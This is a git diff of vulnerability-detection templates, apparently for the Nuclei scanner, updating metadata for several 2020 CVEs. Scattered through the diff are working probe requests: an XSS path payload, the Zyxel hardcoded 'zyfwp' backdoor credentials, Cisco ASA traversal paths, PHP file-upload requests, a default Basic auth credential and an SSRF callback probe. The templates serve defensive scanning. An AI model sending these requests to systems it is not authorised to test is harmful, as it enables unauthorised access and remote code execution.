CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-28351 cwe-id: CWE-79 - epss-score: 0.0031 - tags: packetstorm,cve,cve2020,shoretel,xss + epss-score: 0.0036 + epss-percentile: 0.69097 + cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mitel + product: shoretel_firmware + tags: packetstorm,cve,cve2020,shoretel,xss http: - method: GET path: - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header - type: status status: - 200 -# Enhanced by mp on 2022/08/15 +# digest: 490a00463044022076506563cdd9e96c0b6b595a9fdc96e666f1dc8afe30ca9a130e88100ea7901702205ff0f416d5204219aae832976ec733fd270a98fb0e1f5ddec7dae0187a72657f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 212620f47f..722a1093fe 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -5,21 +5,27 @@ info: author: gy741 severity: critical description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + remediation: | + Upgrade to a patched version of Monitorr or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/48980 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html + - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - cpe: cpe:2.3:a:monitorr_project:monitorr:*:*:*:*:*:*:*:* - epss-score: 0.96822 + epss-score: 0.96996 + epss-percentile: 0.99648 + cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 - tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce + vendor: monitorr_project + product: monitorr + tags: unauth,cve,fileupload,monitor,edb,intrusive,packetstorm,cve2020,rce http: - raw: @@ -42,7 +48,6 @@ http: GIF89a213213123 -----------------------------31046105003900160576454225745-- - - | GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1 Host: {{Hostname}} @@ -57,3 +62,5 @@ http: - type: status status: - 200 + +# digest: 490a0046304402201460626b30907b97371337e85042d92f5a819f475abed7e8027d47af5c9767130220673051ea9ffffc8ecd9d67b0fb1107706b3a95e99508673c1c18f927faaf1145:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index f4e9127843..d2c9d850b5 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -5,21 +5,28 @@ info: author: LogicalHunter severity: medium description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/49189 - https://www.canto.com/integrations/wordpress/ - https://github.com/CantoDAM/Canto-Wordpress-Plugin - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28976 cwe-id: CWE-918 - cpe: cpe:2.3:a:canto:canto:*:*:*:*:*:*:*:* - epss-score: 0.004 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb + epss-score: 0.00616 + epss-percentile: 0.76429 + cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 + vendor: canto + product: canto + framework: wordpress + tags: packetstorm,cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb http: - method: GET @@ -29,6 +36,7 @@ http: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -50,4 +58,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 490a0046304402201430f913fafdbf51372b85264d685368aef5312a1d058f474c911c0871c491f00220255ce7c2b6619f6bb67df9bd9abb2e818fc6cccd0412c5c768f1c92fd7770b11:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 7a22a10927..56f54a20d8 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting. + remediation: | + Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d - https://pacsone.net/download.htm @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29164 cwe-id: CWE-79 + epss-score: 0.00205 + epss-percentile: 0.58247 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* - epss-score: 0.00159 - tags: pacsone,xss,cve,cve2020 metadata: max-request: 1 + vendor: rainbowfishsoftware + product: pacsone_server + tags: pacsone,xss,cve,cve2020 http: - method: GET @@ -27,19 +32,18 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - "text/html" - part: header - type: word + part: body words: - '1' - part: body - type: status status: - 200 -# Enhanced by mp on 2022/08/15 +# digest: 490a004630440220480c6b37567a70b990c7b545d3dee3211f7d877716a3cccacfb0bac7955a33870220335c62407836c6bba8fa0f721f37b58bcececb997281a40234a1cc1e5d6d5aea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 75833724c6..dd26e06745 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0. reference: - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 @@ -13,11 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:* - epss-score: 0.00625 - tags: cve,cve2020,lfi + epss-score: 0.00556 + epss-percentile: 0.7504 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: car_rental_management_system_project + product: car_rental_management_system + tags: cve,cve2020,lfi http: - method: GET @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/16 +# digest: 4a0a0047304502205839618f4a85b28f62b25b62c592c64a4aea336a078ce2c65be7746efde6c20f022100a7d9d6b60e9db8bee1c174de8b78ca17c182fa116b1566124e9e97de7f5fbd6d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 93d5deb1c2..d270f66148 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -6,21 +6,27 @@ info: severity: critical description: | Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0. reference: - https://www.exploit-db.com/exploits/48984 - https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip - https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + - https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:*:*:*:*:*:*:*:* - epss-score: 0.02921 + epss-score: 0.04855 + epss-percentile: 0.91845 + cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: multi_restaurant_table_reservation_system_project + product: multi_restaurant_table_reservation_system tags: cve2020,tablereservation,sqli,unauth,edb,cve http: @@ -45,4 +51,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/08 +# digest: 4a0a004730450220023fd2a0d94c63a2f785b69341207338384fcbac283688293e43f9bb86bad2a70221008d8c3ed502c2da01c6a0aae70aba7e38c83e561bde96c0ddc9b2d8d8b1d7b8e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 9a52db78db..064f9411b6 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + remediation: | + Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. reference: - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://www.myeventon.com/news/ @@ -15,10 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:*:*:* - epss-score: 0.03985 + epss-score: 0.05489 + epss-percentile: 0.92345 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: myeventon + product: eventon + framework: wordpress tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm http: @@ -29,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/14 +# digest: 4a0a00473045022100b5f5cf95060ae7eebc67dc78b79ec20ac4e3382368c6efce2e2e7b6d8fa28bf9022036442a62129495537d85940baaf95295d869aa58146cbe0a26489bee544680d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index e488c02e6a..12e357c211 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-72014 - https://nvd.nist.gov/vuln/detail/CVE-2020-29453 @@ -13,11 +15,15 @@ info: cvss-score: 5.3 cve-id: CVE-2020-29453 cwe-id: CWE-22 - epss-score: 0.0129 + epss-score: 0.01279 + epss-percentile: 0.84217 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: atlassian + product: data_center shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira,lfi + tags: cve,cve2020,atlassian,jira,lfi,intrusive http: - method: GET @@ -27,13 +33,13 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - com.atlassian.jira + - type: status status: - 200 - - type: word - words: - - 'com.atlassian.jira' - part: body - -# Enhanced by mp on 2022/03/24 +# digest: 490a0046304402205a590f73a38842581980853c83840ad2ad9d52224451f9b549f305319c7f1abb02203545496b999fdfb25adaa0b5d2c1119ff0de61f4fae117d311f5f03428d9574a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index da1087b5d6..09e385f490 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -6,19 +6,27 @@ info: severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. + remediation: | + Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: - https://www.zyxel.com/support/CVE-2020-29583.shtml - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 - https://nvd.nist.gov/vuln/detail/CVE-2020-29583 - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html + - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 + epss-score: 0.96102 + epss-percentile: 0.99316 + cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: zyxel + product: usg20-vpn_firmware shodan-query: title:"USG FLEX 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev @@ -27,12 +35,12 @@ http: - | GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 Host: {{Hostname}} - - | GET /ext-js/index.html HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -46,3 +54,5 @@ http: - type: status status: - 200 + +# digest: 490a0046304402206efc3f45aa7ccede6cd556755de7291ce308f948fb25ad6438e6b62146c0ac6f02200e0b757e63bf374fd2832e8542c9e5e5a1aaba74c95ba4b55037569b3a6ffcb6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 88a40e1ef5..b25e435e96 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. + remediation: | + Apply the latest security patch or update to a version that addresses the vulnerability. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 @@ -16,11 +18,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - cpe: cpe:2.3:a:incomcms_project:incomcms:*:*:*:*:*:*:*:* - epss-score: 0.78911 + epss-score: 0.81807 + epss-percentile: 0.9801 + cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: incomcms_project + product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive http: @@ -36,12 +41,12 @@ http: {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word @@ -54,4 +59,4 @@ http: words: - '{{randstr_2}}' -# Enhanced by CS 06/06/2022 +# digest: 490a0046304402202b6018741ac1020bc895526ec93574c762e230e7dbba7ecf7cb920394ec2cb650220433f28b1df3acdd49dff927ede79df316bb7e7996948622c4c039992231327a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index 8b78d86539..46bff7ff79 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -5,6 +5,8 @@ info: author: KareemSe1im severity: critical description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system. + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability. reference: - https://twitter.com/aboul3la/status/1286809567989575685 - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html @@ -15,10 +17,14 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97309 - tags: cve,cve2020,cisco,packetstorm + epss-score: 0.97293 + epss-percentile: 0.9982 + cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,cisco,packetstorm http: - method: GET @@ -28,13 +34,13 @@ http: matchers-condition: and matchers: - type: word + part: header words: - webvpn - Webvpn - part: header - type: status status: - 200 -# Enhanced by mp on 2022/04/28 +# digest: 4b0a00483046022100d08f273178d020cfe6733083b8cca770c204f2acdac4685ae859b5db931e896102210099e80545fade7a4dd323a52b4bb4ffc62e0b176ea5c3faf2b7d55abbfd195f2a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 7dd7884ad3..c395551dfb 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: - https://twitter.com/aboul3la/status/1286012324722155525 - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html @@ -18,18 +20,22 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20 - cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* - epss-score: 0.97563 - tags: lfi,kev,packetstorm,cve,cve2020,cisco + cwe-id: CWE-22,CWE-20 + epss-score: 0.97541 + epss-percentile: 0.99992 + cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: cisco + product: adaptive_security_appliance_software + tags: lfi,kev,packetstorm,cve,cve2020,cisco http: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: - type: word words: @@ -37,4 +43,4 @@ http: - "CONF_VIRTUAL_KEYBOARD" condition: and -# Enhanced by mp on 2022/07/15 +# digest: 4a0a00473045022100820d286cf054256af925bc87d591248dbcbfc2f9166376f0c3278aa7cfc4afd0022054022e64cbcc2dbca69d263b4c20a306a235502529980dd8fe43764b3948a898:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index b141b1bb41..48b6b38f6d 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -5,21 +5,25 @@ info: author: PR3R00T severity: high description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - https://wordpress.org/plugins/easy-wp-smtp/#developers - remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:*:*:* - epss-score: 0.53008 - tags: cve,cve2020,wordpress,wp-plugin,smtp + epss-score: 0.38965 + epss-percentile: 0.96812 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: wp-ecommerce + product: easy_wp_smtp + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,smtp http: - method: GET @@ -35,4 +39,4 @@ http: - "Index of" condition: and -# Enhanced by cs on 2022/02/28 +# digest: 490a0046304402201528c492b1d658545000113adfb6c8b94ad5c4eabd4b55cb7c224fd5e7a8607f02206b45768106a93015b34af3fe600342934df474f0ad7c100031f94676589bc597:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 29c7510c0f..211a494f5b 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -5,6 +5,8 @@ info: author: Jeya Seelan severity: critical description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface. + remediation: | + Change the default credentials to strong and unique ones. reference: - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 @@ -14,27 +16,31 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 + epss-score: 0.09782 + epss-percentile: 0.94174 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* - epss-score: 0.04997 - tags: cve,cve2020,wmt,default-login metadata: max-request: 1 + vendor: mobileviewpoint + product: wireless_multiplex_terminal_playout_server + tags: cve,cve2020,wmt,default-login http: - method: GET path: - "{{BaseURL}}/server/" + headers: Authorization: "Basic OnBva29u" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "WMT Server playout" -# Enhanced by mp on 2022/04/28 + - type: status + status: + - 200 + +# digest: 490a0046304402207bb8a0c177c4be71022ed47c9b1dbcb3f2ce4aaedd05690d308867307eef144602204c66d5b76f88386923ea1d6cae9f5a9632a3563aa2b8a6d68b3e95bade2e9b9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 857c5f6d8d..1b65ba1d27 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability. reference: - https://github.com/OpenTSDB/opentsdb/issues/2051 - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html @@ -15,11 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 + epss-score: 0.96079 + epss-percentile: 0.99312 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* - epss-score: 0.78489 metadata: - max-request: 1 verified: true + max-request: 1 + vendor: opentsdb + product: opentsdb shodan-query: html:"OpenTSDB" tags: cve,cve2020,opentsdb,rce,packetstorm @@ -30,7 +35,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: @@ -48,4 +52,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100da898cbe90b3a213f7a685d50b37212560ba6c14da7db74b6a35934005d158cb02202cdbdb47cec6dae0d8c6caabc886bef4cea6a0de7bb892ae9e177e4297ae0600:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 31b40151ce..881e274f33 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -5,45 +5,39 @@ info: author: soyelmago severity: critical description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters. + remediation: | + Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-35489 - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/ - https://wordpress.org/plugins/contact-form-7/#developers - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/ + - https://contactform7.com/2020/12/17/contact-form-7-532/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.90859 - tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive + epss-score: 0.91898 + epss-percentile: 0.98618 + cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: rocklobster + product: contact_form_7 + framework: wordpress + tags: cve,cve2020,wordpress,wp-plugin,rce http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - compare_versions(version, '< 5.3.2') - type: word part: body @@ -52,8 +46,21 @@ http: - '== Changelog ==' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 5.3.2') + - type: status + status: + - 200 -# Enhanced by mp on 2022/04/28 + extractors: + - type: regex + name: version + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" + internal: true + + - type: regex + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" + +# digest: 4b0a00483046022100db94a2335628bf8c5d47ed1a0f57b261ce36d277c546c21200a36f2f71f9d4f5022100f677dcb828075ac4bd0c3dc5a05fe8abece52ba41a85de686ac9c53aba317cbc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 27f09460e6..a44b03949a 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users. + remediation: | + Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability. reference: - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html - https://developer.searchblox.com/docs/getting-started-with-searchblox @@ -13,12 +15,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35580 - cwe-id: CWE-522 + cwe-id: CWE-22 + epss-score: 0.02597 + epss-percentile: 0.89107 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* - epss-score: 0.02178 - tags: cve,cve2020,lfi metadata: max-request: 1 + vendor: searchblox + product: 